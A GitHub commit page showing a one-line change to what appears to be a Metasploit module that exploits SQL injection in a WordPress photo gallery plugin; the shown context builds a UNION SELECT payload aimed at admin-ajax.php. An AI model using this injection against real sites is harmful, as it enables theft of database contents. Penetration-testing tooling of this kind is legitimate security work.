We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 622072b commit 69f8679Copy full SHA for 69f8679
modules/auxiliary/gather/wp_photo_gallery_sqli.rb
@@ -54,7 +54,7 @@ def initialize(info = {})
54
55
def get_sqli_object
56
create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|
57
- expr = payload.to_s.strip.gsub(/\s+/, ' ')
+ expr = payload.to_s.gsub(/\s+/, ' ').strip
58
cols = Array.new(23) { |i| i == 7 ? "(#{expr})" : rand(1000..9999).to_s }
59
injected = ")\" union select #{cols.join(',')} -- -g"
60
endpoint = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
0 commit comments